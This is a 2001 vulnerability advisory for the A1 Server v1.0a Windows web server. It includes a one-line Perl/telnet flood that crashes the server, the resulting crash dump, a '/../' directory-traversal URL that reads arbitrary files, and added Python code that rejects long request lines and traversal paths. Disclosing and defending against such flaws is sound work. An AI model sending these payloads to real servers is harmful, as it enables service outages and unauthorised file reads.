
A1 Server v1.0a HTTPd (DoS & Dir Traversal)

by Phiber on February 28th, 2001

A1 Server v1.0a is an HTTPd server for the Windows OS that serves the following content: GIF images, HTM or HTML pages, EXE files, and ZIP files. The server is very small, yet somewhat stable, and is freeware! (Yeah. right)


Problem #1 : Denial of Service Attack

A1 Server v1.0a is vulnerable to a nasty Denial of Service attack: it can be flooded with useless junk until the server crashes promptly. Once it has crashed it needs to be restarted for it to work properly. All Windows versions appear to be affected.



Example:

echo `perl -e 'print "A" x 1000'` | telnet a1server 80

^^ = Will cause the program to quit within seconds and display:



A1SERVER caused an invalid page fault in module A1SERVER.EXE at 016f:004101ae.
Registers:
EAX=00000000 CS=016f EIP=004101ae EFLGS=00010246
EBX=00420094 SS=0177 ESP=006bfc70 EBP=006bfc78
ECX=ffffffff DS=0177 ESI=00000001 FS=6417
EDX=004263b2 ES=0177 EDI=00000001 GS=5e47
Bytes at CS:EIP:
f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc
Stack dump:
004211a8 0000001c 006bfca8 004151db 004211a8 00000001 006bfcb0 00008d20
006bfcfc bff7b796 bffc9490 00000177 006bfcb8 bff7b828 006bfcc8 bff7363b



Problem #2 : Directory Traversal

Adding the string "/../" to a URL allows an attacker to view any file on the server, provided they know where the file is in the first place.

Example:

http://www.a1server.win/../../../../../../Scandisk.log

^^ = Will obviously open the Scandisk.log file.
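Both problems come down to a request handler that trusts its input: no cap on the request line, and no check that the requested path stays under the document root. The Python below is an added example written for this page, not code from A1 Server or from the advisory; the document root "C:/www", the 8190-byte cap and the status codes returned are assumptions, and the path check rejects a request outright the moment a ".." would climb above the root rather than silently collapsing it.

```python
import posixpath
from urllib.parse import unquote

# Assumption: a cap on the request line. The advisory's server has none and
# faults when fed a long run of "A"s; 8190 matches Apache's default limit.
MAX_REQUEST_LINE = 8190


def resolve_request_path(docroot: str, raw_path: str):
    """Map a URL path onto a file under docroot.

    Returns the confined path, or None when the request would leave the
    document root (the "/../../Scandisk.log" case) or carries characters the
    server should never hand to the Windows filesystem.
    """
    path = unquote(raw_path.split("?", 1)[0])  # drop query, decode %2e%2e etc.
    path = path.replace("\\", "/")             # Windows also accepts backslash
    if "\x00" in path or ":" in path:          # NUL truncation, drive letters, ADS
        return None
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:                      # would climb above docroot
                return None
            stack.pop()
        else:
            stack.append(seg)
    return posixpath.join(docroot, *stack) if stack else docroot


def handle_request_line(docroot: str, line: bytes):
    """Return (status, path) for one HTTP request line, refusing bad input early."""
    if len(line) > MAX_REQUEST_LINE:
        return 414, None                       # too long: refuse rather than crash
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return 400, None                       # "AAAA..." is not a request line
    target = resolve_request_path(docroot, parts[1].decode("latin-1"))
    if target is None:
        return 403, None                       # traversal attempt: log and refuse
    return 200, target
```

A 403 or 414 from this handler is also the event worth alerting on, since a legitimate client never sends either a bare run of junk or a path that climbs above the root.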





The vendor's website

Vendor has been notified. No e-mail reply yet.

--------------------
b10z HTTPd Advisory
[email protected]

Found: February 26th, 2001.

